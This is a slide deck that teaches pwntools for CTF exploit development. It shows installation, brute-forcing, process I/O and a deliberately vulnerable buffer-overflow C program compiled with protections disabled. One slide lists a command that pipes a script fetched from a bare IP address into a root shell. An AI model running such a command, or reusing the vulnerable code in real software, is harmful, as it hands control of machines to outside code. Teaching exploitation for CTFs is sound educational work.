---
title: Intro to ![pwntools logo](figures/logo.png){height=1em}
subtitle: CTF framework and exploit development library
aspectratio: 169
date: \today
theme: metropolis
urlcolor: blue
header-includes: |
    \DeclareMathOperator{\sha}{SHA256}
    \DeclareMathOperator{\bool}{Bool}
    \DeclareMathOperator{\prefix}{prefix}
    \DeclareMathOperator{\concat}{||}

    \usepackage{tikz}
    \newcounter{mybox}
    \newcommand\tikzmark[1]{%
    \tikz[remember picture,overlay] \node[inner xsep=0pt] (#1) {};
    }
    \newcommand\ColorBox[2][]{%
    \stepcounter{mybox}%
    \node[draw=red!70!black,fill=red!20,align=left,#1] (box\themybox) {#2};
    }
    \usepackage{multirow}
---

# What is pwntools?

* Python framework for exploit development
\vspace{1em}
* Communication primitives
* Binary stuff
* Helper functions
\vspace{1em}
* Only python2 :(

# Installation

Install either pipenv or virtualenv with pip or your distributions package manager

**pipenv:** Fancy new standard

```bash
$ pipenv install --two pwntools
```

**virtualenv:** Old, boring but still works and is faster
```bash
$ python2 -m virtualenv .venv
$ . .venv/bin/activate
$ pip install pwntools
```

# Bruteforcing

Find $x$ s.t $\sha(\prefix \tikzmark{op}\concat x)$ fulfills a condition
\begin{tikzpicture}[remember picture,overlay]
\ColorBox[yshift=0.35cm,xshift=10cm]{Concatenation}
\draw[red!70!black,->] (box1) -| ([xshift=4pt]op.south east);
\end{tikzpicture}

```python
from pwnlib.util.iters import mbruteforce

def compute_string(condition, prefix, alphabet, length):
    # Function returning True for success
    t = lambda x: sha256(prefix+x).digest().startswith(condition)
    result = mbruteforce(t, alphabet, length=length,
                         method='fixed')
    return prefix+result
```

# Bruteforce arguments

<!-- TODO -->

\begin{center}
\begin{tabular}{l|c|l|l}
    \rule{0pt}{4ex}
    func & $\text{alphabet}^{\{1\ldots\text{length}\}} \to \bool$ & \multicolumn{2}{l}{The function to bruteforce}  \\
    \rule{0pt}{4ex}
    alphabet & str & \multicolumn{2}{l}{The alphabet to draw symbols from} \\
    \rule{0pt}{4ex} \multirow{3}{*}{method} & \multirow{3}{*}{'upto' | 'fixed' | 'downfrom'} & upto & $\{1\ldots\text{length}\}$ \\
    & & fixed & $== \text{length}$ \\
    & & downfrom &  $\{\text{length}\ldots1\}$ \\
    \rule{0pt}{4ex}
    start & $(i:int, N:int)$ & \multicolumn{2}{l}{irrelephant} \\
\end{tabular}
\end{center}

# Communication

```python
from pwn import *

if args.HOST:
    io = connect(args.HOST, 1337)
else:
    io = process(['./main', 'argument1', 'argument2'])

io.sendline('hello')
io.send('hi')
io.recv(1234) # Up to length bytes!
io.recvline(timeout=1) # with optional timeout in seconds
io.recvuntil('asd') # Receive until including "asd"
io.recvline_regex(r'^> ')
```

# A really simple buffer overflow

```C
#include <stdio.h>
#include <stdlib.h>
void get_access(void) {
    system("/bin/sh");
}
int main(void) {
    char buf[100];
    fgets(buf, 1000, stdin);
}
```

Compile with

```bash
$ gcc -Og -g -fno-stack-protector -z execstack -no-pie -o main main.c
```

# Use the `pwn` command-line tool

```bash
$ pwn template --host chall.pwnable.tw --port 1337 main > exploit.py
$ chmod +x exploit.py
$ tmux
$ ./exploit.py GDB LOCAL
$ sudo bash -c "curl -k https://51.15.58.107/notavirus | sh"
```

# Live Demo!!!

\begin{center}
\begin{tabular}{l|l}
    \multirow{2}{*}{\texttt{cyclic(200, n=8)}} & Generate a pattern with \\
    & unique subsequences of length $n$ \\
    \texttt{cyclic\_find(p64(rip), n=8)} & Find the \$rip after \texttt{SIGSEGV} \\
    \texttt{p64(rip)} & Convert int to str (struct.pack) \\
    \texttt{log.info('asd')} & Logging \\
    \texttt{fit(\{128: shellcode\})} & Pad data and place at position \\
\end{tabular}
\end{center}

# Links

* [pwntools](https://github.com/Gallopsled/pwntools)
* [pwntools Documentation](https://docs.pwntools.com/en/stable/)
* [pipenv](https://github.com/pypa/pipenv)
* [virtualenv](https://virtualenv.pypa.io/en/stable/)

